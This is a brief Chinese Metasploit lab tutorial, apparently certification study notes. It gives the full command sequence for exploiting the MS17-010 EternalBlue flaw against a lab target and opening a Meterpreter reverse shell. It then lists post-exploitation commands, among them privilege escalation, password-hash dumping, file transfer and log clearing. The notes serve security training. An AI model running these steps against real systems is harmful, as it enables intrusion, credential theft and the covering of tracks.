3、MSF使用

文章目录

  • 一、利用ms17-010漏洞对靶机执行溢出攻击
  • 二、后渗透模块meterpreter的使用

一、利用ms17-010漏洞对靶机执行溢出攻击

分别输入以下命令,使用ms17_010_eternalblue模块对目标机的ms17-010漏洞进行利用:

use exploit/windows/smb/ms17_010_eternalblue    //使用ms17_010_eternalblue模块
set RHOST [靶机IP]    //设置远程主机(靶机)的IP地址
set LHOST [操作机IP]   //设置本地主机(操作机)的IP地址
set payload windows/x64/meterpreter/reverse_tcp    //使用payload:meterpreter/reverse_tcp
set RPORT 445    //设置目标端口
set target 0    //设置目标操作系统类型(此处为自动识别类型) 
run    //执行

3、MSF使用_第1张图片
溢出攻击成功后,返回meterpreter提示符

3、MSF使用_第2张图片

常规情况下用exp攻破了系统,需要与靶机进行通信,以便操纵靶机,一般用反弹shell,这个反弹shell的代码就是payload

二、后渗透模块meterpreter的使用

pwd    //打印当前工作目录
sysinfo     // 查看系统信息
getuid      //获取当前权限的用户id
ps       //查看当前目标机上运行的进程列表和pid
getsystem      //获取system权限
screenshot    //截取目标主机当前屏幕
hashdump     //获取用户名与hash口令
shell     //获取目标主机shell
upload     //上传一个文件
download    //下载一个文件
execute     //执行目标系统中的文件(-f指定文件,-i执行可交互模式,-H隐藏窗口)
clearev    //清除日志
background    //将meterpreter放入后台(使用sessions -i重新连接到会话)

3、MSF使用_第3张图片

你可能感兴趣的:(深信服SCSA-S认证,安全)